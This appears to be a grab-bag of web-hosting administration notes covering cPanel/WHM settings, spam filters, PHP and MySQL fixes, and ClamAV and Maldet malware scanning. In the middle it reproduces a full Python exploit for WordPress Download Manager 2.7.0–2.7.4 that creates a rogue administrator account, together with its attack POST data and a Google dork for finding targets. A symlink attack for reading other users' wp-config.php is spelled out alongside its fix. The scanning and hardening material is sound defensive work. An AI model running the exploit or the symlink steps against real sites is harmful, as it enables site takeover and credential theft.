How to change a domain nameserver from squarespace to bluehost.

Yesterday, I have to change a domain nameserver from squarespace to bluehost. It takes at least 4 hours to find out the way ...

Why ?

Point 1: When I point nameserver to bluehost and trying to attach my domain it shows verified but verification required.

Point 2: Squarespace is a prebuilt site like wix.com . So it has no upload option by which I can verify it.

Point 3: The otherman who own this domain before not wish to give his password of old hosting..

Point 4: But he wants to help me anyway ...

So what I have to do ....
 
Just a trick ;) and it works perfectly ...

Increase Bandwidth for a domain

To increase the bandwidth you need to use WHM, not cPanel.

To do so go to your WHM Panel (http://serverhostname.com:2086) --> Limit Bandwidth Usage (under the 'Account Functions' section) --> Select the domain and press 'Limit' --> Increase the number and hit 'Change'

To make the domain have unlimited bandwidth, you can input 'unlimited' into the box and this will do this.

Hopefully that answers your question!

How To Enable BoxTrapper In cPanel/WHM Server?

1) Login into WHM.
2) Click on Tweak Settings [see image below]


3) check/uncheck on BoxTrapper Spam Trap under email settings to enable/disable it. [see this image]

4) Save the settings.

That’s it!

How to enable SpamAssassin in cPanel/WHM

Spam filters are a very important part of any mail server. ServInt VPS accounts using the cPanel/WHM control panel come with SpamAssassin as part of the standard installation. The default configuration has SpamAssassin enabled.

If you need to reenable SpamAssassin:

• In WHM, under Server Configuration on the top of the left-hand navigation bar, click on Tweak Settings.
• Click the Mail tab. 
• Select On for "Enable SpamAssassin spam filter."

Note: ServInt recommends leaving "Enable BoxTrapper spam trap" set to Off.

To force all the users on your VPS to use SpamAssassin:

• Scroll down the left left hand navigation bar in WHM to Service Configuration and click on Exim Configuration Manager.
• Select the SpamAssassin tab.
• Set "Spam Assassin: Forced Global ON" to On. 

This will filter all of your email for spam.  It will not, however, force your users to do anything with it after it's filtered. It will simply mark spam as spam, nothing more.

cPanel temporary URL not working

When accessing cPanel temporary URL, at times you get a 404 error. This is even if the cPanel account is created & website content uploaded on the server. Monitoring apache error log file, it shows error as below.

File does not exist: /usr/local/apache/htdocs/~user

This happens when mod_userdir is enabled on the server. Apache’s mod_userdir allows users to view their sites by entering a tilde(~) and their username as the URL on a specific host. For example http://server-ip/~user/ will bring up the user user’s domain. The disadvantage of this feature is that any bandwidth usage used by this site will be put on the domain it is accessed under (in this case test.domain.com). mod_userdir protection prevents this from happening. You may however want to disable it on specific virtual hosts (generally shared ssl hosts.) When accessing with the temp URL nobody user has to be excluded from the mod_userdir restriction.
Login to your WHM as root & access option Security Center >> Apache mod_userdir Tweak. Uncheck for DefaultHost (nobody) & click on save. Try accessing the temporary URL now.

Note: Just write user in left hand search field and you get Apache mod_userdir ...

How to turn off php safe_mode off for a particular directory in a shared hosting environment?

Your service provider might have forgot to tell you that you need to enable your user defined php.ini configuration by adding this line in the .htaccess file that you find in your public_html folder:

#Activates php.ini config located in main folder to work also recursively for all subfolders
suPHP_ConfigPath /home/YOUR_CPANEL_USER_NAME/public_html

Obviously replace YOUR_CPANEL_USER_NAME with your cPanel user name.
I'm supposing your server has got suPHP module(which is quite common in nowdays).
BTW: the php.ini file need to be in /home/YOUR_CPANEL_USER_NAME/public_html too and inside you should write this:
safe_mode = Off And remember that Safe Mode is deprecated in PHP 5.3.0 and is removed in PHP 6.0.0.

Solutions for handling symlink attacks

1) He login to cPanel as a normal user http://ip-address/cpanel then type login and password to Login
2) Then he open File manager (show hidden files "dotfiles") and then creates new .htaccess file with following source:
#.htaccess file source
Options Indexes FollowSymLinks
DirectoryIndex doesnt-metter.htm
AddType txt .php
AddHandler txt .php
#End of .htaccess file
3) Then he creates symbalic link (soft link) with perl scripts or just uses CRON job to create symbalic link of top level directory "/" typing: "ln -s / topdir"
4) After that, he open browser and typing http://server-ip/~his-home-dir/topdi.../wp-config.php and then just looking source of the page, all data present as a TXT(text) data. That's all. User has been hacked.
-------------------------------------------------------------------------------------------------------
Solution:
1) Open you'r php.conf with you'r favorite editor: nano /usr/local/apache/conf/php.conf
2) Commit: #AddType application/x-httpd-php5 .php5 .php4 .php .php3 .php2 .phtml
3) Add these lines:
<FilesMatch "\.ph(p[2-6]?|tml)$"> # this equal to: .php, .php2, .php3, .php4, .php5, .php6 .phtml
SetHandler application/x-httpd-php5
</FilesMatch>
4) Save you'r changes and close php.conf
5) Restart httpd server typing: /etc/init.d/httpd restart
6) Done

How do I fix the error “Mysql Server has gone away”?

The MySQL server has gone away (error 2006) has two main causes and solutions:

• Server timed out and closed the connection. To fix, check that “wait_timeout” mysql variable in your my.cnf configuration file is large enough.
• Server dropped an incorrect or too large packet. If mysqld gets a packet that is too large or incorrect, it assumes that something has gone wrong with the client and closes the connection. To fix, you can increase the maximal packet size limit “max_allowed_packet” in my.cnf file, eg. set max_allowed_packet = 128M, then sudo /etc/init.d/mysql restart.

For wamp, you have to check in my.ini  in wamp in bin > mysql

Check for old plugins with exploit database...

Exploit Database :

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=wordpress&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=


CVE :

http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/Wordpress-Wordpress.html


WP SCAN

https://wpvulndb.com/ 

http://www.wordpressexploit.com/

http://wpsecure.net/

Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability

#!/usr/bin/python

#

# Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution

#

# Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)

#

# Exploit written by Claudio Viviani

#

#

# 2014-12-03:  Discovered vulnerability

# 2014-12-04:  Patch released (2.7.5)

#

# Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk

#

# --------------------------------------------------------------------

#

# The vulnerable function is located on "/download-manager/wpdm-core.php" file:

#

# function wpdm_ajax_call_exec()

# {

#    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {

#         if (function_exists($_POST['execute']))

#             call_user_func($_POST['execute'], $_POST);

#         else

#             echo "function not defined!";

#         die();

#     }

# }

#

# Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).

# wpdm_ajax_call_exec() call functions by call_user_func() through POST data:

#

#         if (function_exists($_POST['execute']))

#             call_user_func($_POST['execute'], $_POST);

#         else

#         ...

#         ...

#         ...

#

# $_POST data needs to be an array

#

#

# The wordpress function wp_insert_user is perfect:

#

# http://codex.wordpress.org/Function_Reference/wp_insert_user

#

# Description

#

# Insert a user into the database.

#

# Usage

#

# <?php wp_insert_user( $userdata ); ?>

#

# Parameters

#

# $userdata

#     (mixed) (required) An array of user data, stdClass or WP_User object.

#        Default: None

#

#

#

# Evil POST Data (Add new Wordpress Administrator):

#

# action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator

#

# ---------------------------------------------------------------------

#

# Dork google:  index of "wordpress-download"

#

# Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6

#

# Http connection

import urllib, urllib2, socket

#

import sys

# String manipulator

import string, random

# Args management

import optparse

 

# Check url

def checkurl(url):

    if url[:8] != "https://" and url[:7] != "http://":

        print('[X] You must insert http:// or https:// procotol')

        sys.exit(1)

    else:

        return url

 

# Check if file exists and has readable

def checkfile(file):

    if not os.path.isfile(file) and not os.access(file, os.R_OK):

        print '[X] '+file+' file is missing or not readable'

        sys.exit(1)

    else:

        return file

 

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):

    return ''.join(random.choice(chars) for _ in range(size))

 

banner = """

    ___ ___               __

   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.

   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|

   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|

   |:      |    ______      |__|              __                __

   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |

   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |

               |.  |    |_____|________|__|__|__|_____|___._|_____|

               |:  1    /   ___ ___

               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.

               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|

                           |. \_/  |___._|__|__|___._|___  |_____|__|

                           |:  |   |                 |_____|

                           |::.|:. |

                           `--- ---'

                                                   Wordpress Download Manager

                                                      R3m0t3 C0d3 Ex3cut10n

                                                         (Add WP Admin)

                                                          v2.7.0-2.7.4

 

                               Written by:

 

                             Claudio Viviani

 

                          http://www.homelab.it

 

                             info@homelab.it

                         homelabit@protonmail.ch

 

                   https://www.facebook.com/homelabit

                      https://twitter.com/homelabit

                    https://plus.google.com/+HomelabIt1/

           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""

 

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')

commandList.add_option('-t', '--target', action="store",

                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",

                  )

commandList.add_option('--timeout', action="store", default=10, type="int",

                  help="[Timeout Value] - Default 10",

                  )

 

options, remainder = commandList.parse_args()

 

# Check args

if not options.target:

    print(banner)

    commandList.print_help()

    sys.exit(1)

 

host = checkurl(options.target)

timeout = options.timeout

 

print(banner)

 

socket.setdefaulttimeout(timeout)

 

username = id_generator()

pwd = id_generator()

 

body = urllib.urlencode({'action' : 'wpdm_ajax_call',

                         'execute' : 'wp_insert_user',

                         'user_login' : username,

                         'user_pass' : pwd,

                         'role' : 'administrator'})

 

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

 

print "[+] Tryng to connect to: "+host

try:

    req = urllib2.Request(host+"/", body, headers)

    response = urllib2.urlopen(req)

    html = response.read()

 

    if html == "":

       print("[!] Account Added")

       print("[!] Location: "+host+"/wp-login.php")

       print("[!] Username: "+username)

       print("[!] Password: "+pwd)

    else:

       print("[X] Exploitation Failed :(")

 

except urllib2.HTTPError as e:

    print("[X] "+str(e))

except urllib2.URLError as e:

    print("[X] Connection Error: "+str(e))

Find Vulnerable timthumb script all over the server

find . -name "*thumb.php" -exec grep -H -n 'WEBSHOT_ENABLED' {} \;

or

find / -name '*.php' -exec grep WEBSHOT_ENABLED {} \;


To secure it use :

define (‘WEBSHOT_ENABLED’, false); 

Clamav Commands 4.1.2015

Terminal

At first you have to update the virus definitions with:

sudo freshclam

Then you can scan for viruses.

 clamscan OPTIONS File/Folder 

If necessary start with root permissions: sudo clamscan.
Examples:

• To check all files on the computer, displaying the name of each file:
  

  clamscan -r /
  

• To check all files on the computer, but only display infected files and ring a bell when found:
  

  clamscan -r --bell -i /
  

• To check files in the all users home directories:
  

  clamscan -r /home
  

• To check files in the USER home directory and move infected files to another folder:
  

  clamscan -r --move=/home/USER/VIRUS /home/USER
  

• To check files in the USER home directory and remove infected files (WARNING: Files are gone.):
  

  clamscan -r --remove /home/USER
  

• To see more options:
  

  clamscan --help 

  Source: http://askubuntu.com/questions/250290/how-do-i-scan-for-viruses-with-clamav 

Maldet Installation

Malware Detect is very easy to install on CentOS, regardless of the control panel you utilize (cPanel/WHM, Directadmin, etc). Maldet also known as Linux Malware Detect virus scanner for Linux.
There is nothing complicated in installation process, but root access to your server is required. 
Installation via SSH

cd /usr/local/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh or sudo sh ./install.sh
maldet --update-ver
maldet --update[/i]

To scan a folder, for example /home you should type maldet -a /home.

That's it!

Maldet Essential Commands

Syntax:

# maldet [options] /path/to/scan

Important switches of maldet:

1, -b, –background
Execute operations in the background, ideal for large scans

Example:

[root@crybit ~]# maldet -b -r /home/crybit/
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9922): {scan} launching scan of /home/crybit/ changes in last 7d to background, see /usr/local/maldetect/event_log for progress

2, -u, –update
Update malware detection signatures from rfxn.com

3, -d, –update-ver
Update the installed version from rfxn.comExample:

[root@crybit ~]# maldet -d
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9997): {update} checking for available updates...
maldet(9997): {update} hashing install files and checking against server...
maldet(9997): {update} version check shows latest but hash check failed, forcing update...
maldet(9997): {update} completed update v1.4.2 => v1.4.2, running signature updates...
maldet(10289): {sigup} performing signature update check...
maldet(10289): {sigup} local signature set is version 201402051649
maldet(10289): {sigup} latest signature set already installed
maldet(9997): {update} update and config import completed.

4, -m, –monitor USERS|PATHS|FILE
Run maldet with inotify kernel level file create/modify monitoring
If USERS is specified, monitor user homedirs for UID’s > 500
If FILE is specified, paths will be extracted from file, line spaced
If PATHS are specified, must be comma spaced list, NO WILDCARDS!
e.g: maldet –monitor users
e.g: maldet –monitor /root/monitor_paths
e.g: maldet –monitor /home/mike,/home/ashton

Example:

[root@crybit ~]# maldet -m /home/crybit/
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(10347): {mon} set inotify max_user_instances to 128
/usr/local/sbin/maldet: line 1162: /proc/sys/fs/inotify/max_user_instances: Permission denied
maldet(10347): {mon} set inotify max_user_watches to 0
/usr/local/sbin/maldet: line 1164: /proc/sys/fs/inotify/max_user_watches: Permission denied
maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
maldet(10347): {mon} inotify startup successful (pid: 10422)
maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log

5, -k, –kill
Terminate inotify monitoring service

Example:

[root@crybit ~]# maldet -k
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2
maldet(10471): {mon} sent kill to monitor service

6, -r, –scan-recent PATH DAYS
Scan files created/modified in the last X days (default: 7d, wildcard: ?)

e.g: maldet -r /home/?/public_html 2

7, -a, –scan-all PATH
Scan all files in path (default: /home, wildcard: ?)

e.g: maldet -a /home/?/public_html

8, -c, –checkout FILE
Upload suspected malware to rfxn.com for review & hashing into signatures

9, -l, –log
View maldet log file events.Example:

[root@crybit ~]# maldet -l
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

Feb 06 02:38:28 jishnu maldet(10347): {mon} set inotify max_user_watches to 0
Feb 06 02:38:28 jishnu maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
Feb 06 02:38:28 jishnu maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify startup successful (pid: 10422)
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
Feb 06 02:39:43 jishnu maldet(10471): {mon} sent kill to monitor service
Feb 06 02:40:00 jishnu maldet(10347): {mon} monitoring terminated by user, inotify killed.
Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:00 jishnu maldet(10550): {scan} building file list for /home/crybit/ of new/modified files from last 1 days, this might take awhile...
Feb 06 02:41:00 jishnu maldet(10550): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:41:11 jishnu maldet(10615): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:11 jishnu maldet(10615): {scan} building file list for /home/crybit/ of new/modified files from last 2 days, this might take awhile...
Feb 06 02:41:11 jishnu maldet(10615): {scan} scan returned zero results, please increase days range or provide a new path.

10, -e, –report SCANID email
View scan report of most recent scan or of a specific SCANID and optionally e-mail the report to a supplied e-mail address.
e.g: maldet –report
e.g: maldet –report list
e.g: maldet –report 050910-1534.21135
e.g: maldet –report SCANID user@domain.com

11, -s, –restore FILE|SCANID
Restore file from quarantine queue to orginal path or restore all items from a specific SCANID
e.g: maldet –restore /usr/local/maldetect/quarantine/config.php.23754
e.g: maldet –restore 050910-1534.21135

12, -q, –quarantine SCANID
Quarantine all malware from report SCANID
e.g: maldet –quarantine 050910-1534.21135

13, -n, –clean SCANID
Try to clean & restore malware hits from report SCANID
e.g: maldet –clean 050910-1534.21135

14, -U, –user USER
Set execution under specified user, ideal for restoring from user quarantine or to view user reports.
e.g: maldet –user nobody –report
e.g: maldet –user nobody –restore 050910-1534.21135

15, -p, –purge
Clear logs, quarantine queue, session and temporary data.

That’s it!!

Source : http://crybit.com/maldet-options/

Maldet Scan Command

Maldet Single Account Scan Command :

maldet --scan-all /home/domainname